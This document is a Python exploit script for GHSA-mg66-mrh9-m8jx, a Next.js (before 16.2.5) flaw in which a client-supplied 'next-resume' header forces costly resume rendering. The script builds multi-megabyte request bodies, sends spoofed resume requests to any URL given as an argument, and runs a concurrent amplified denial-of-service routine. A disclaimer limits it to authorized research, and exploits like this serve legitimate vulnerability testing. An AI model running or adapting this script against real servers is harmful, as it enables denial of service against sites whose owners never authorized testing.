#!/usr/bin/env python3 # Disclaimer: For authorized security research and educational use only. # Do not use this tool on systems you do not own or have explicit written # permission to test. """ GHSA-mg66-mrh9-m8jx — Next-Resume DoS / Cache-Poisoning exploit. Pre-patch (Next.js < 16.2.5) the renderer trusted the `next-resume` request header to mean "an upstream proxy is requesting PPR resume render". The header was NOT in INTERNAL_HEADERS, so a direct client could supply it and force expensive resume processing on attacker-controlled postponed state. Usage: python3 exploit.py # exercises a local PPR page python3 exploit.py http://target/ppr-page # remote target python3 exploit.py http://t/p 30 20 # 30 MiB body, 20 concurrent requests """ import sys import time import threading import urllib.request import urllib.error class C: R = "\033[31m"; G = "\033[32m"; Y = "\033[33m"; CY = "\033[36m" B = "\033[1m"; X = "\033[0m" def banner(): print(C.CY + C.B + "=" * 65 + C.X) print(C.CY + C.B + " GHSA-mg66-mrh9-m8jx -- Next-Resume DoS" + C.X) print(C.CY + C.B + " Patched in 16.2.5 (commit 9d50c0b719)" + C.X) print(C.CY + C.B + "=" * 65 + C.X) def build_body(size_mb: int) -> bytes: target = size_mb * 1024 * 1024 chunk = b'"X"' + b',"X"' * 10_000 parts = [b'[', chunk] size = sum(len(x) for x in parts) while size < target: parts.append(b',' + chunk) size += len(chunk) + 1 parts.append(b']') return b''.join(parts) def send_resume(target: str, body: bytes, timeout: float = 60.0): req = urllib.request.Request( target, data=body, method='POST', headers={ 'next-resume': '1', 'x-next-resume-state-length': '1', 'Content-Type': 'text/plain', }, ) t0 = time.perf_counter() code = -1 try: with urllib.request.urlopen(req, timeout=timeout) as r: code = r.status r.read() except urllib.error.HTTPError as e: code = e.code except Exception as e: return -1, time.perf_counter() - t0, str(e) return code, time.perf_counter() - t0, None def baseline(target: str): t0 = time.perf_counter() try: with urllib.request.urlopen(target, timeout=30) as r: code = r.status r.read() except urllib.error.HTTPError as e: code = e.code except Exception as e: return -1, time.perf_counter() - t0, str(e) return code, time.perf_counter() - t0, None def main(argv): banner() target = argv[1] if len(argv) > 1 else "http://127.0.0.1:3000/some-ppr-page" size_mb = int(argv[2]) if len(argv) > 2 else 15 concurrency = int(argv[3]) if len(argv) > 3 else 10 print(f"{C.B}[*] Target:{C.X} {target}") print(f"{C.B}[*] Body size:{C.X} {size_mb} MiB") print(f"{C.B}[*] Concurrency:{C.X} {concurrency}\n") print(C.Y + "[*] baseline (no header)..." + C.X) bcode, bwall, berr = baseline(target) print(f" baseline => HTTP {bcode} wall={bwall:.2f}s err={berr}") print(C.Y + "[*] building body..." + C.X) body = build_body(size_mb) print(f" body length = {len(body):,} bytes") print(C.Y + "[*] single resume request..." + C.X) code, wall, err = send_resume(target, body) print(f" exploit => HTTP {code} wall={wall:.2f}s err={err}") if err and 'Connection' in err: print(C.Y + "[!] connection error -- target may not be reachable." + C.X) return 2 vulnerable = False if wall > 2.0: vulnerable = True print(C.G + C.B + f"[+] VULNERABLE — server processed resume request (wall={wall:.2f}s).{C.X}") elif code in (413, 500, 502): vulnerable = True print(C.G + C.B + f"[+] VULNERABLE — server returned {code} (resume code path executed)." + C.X) else: print(C.R + "[-] LIKELY PATCHED — header stripped before reaching renderer." + C.X) print() print(C.Y + f"[*] amplified DoS demo: {concurrency} parallel resume requests..." + C.X) threads = [] results = [] lock = threading.Lock() def worker(): c, w, e = send_resume(target, body) with lock: results.append((c, w, e)) t0 = time.perf_counter() for _ in range(concurrency): t = threading.Thread(target=worker, daemon=True) t.start() threads.append(t) for t in threads: t.join(timeout=120) total = time.perf_counter() - t0 statuses = [r[0] for r in results] walls = [r[1] for r in results] print(f" total wall = {total:.2f}s per-request avg = {sum(walls)/max(1,len(walls)):.2f}s") print(f" statuses = {statuses}") return 0 if vulnerable else 1 if __name__ == "__main__": sys.exit(main(sys.argv))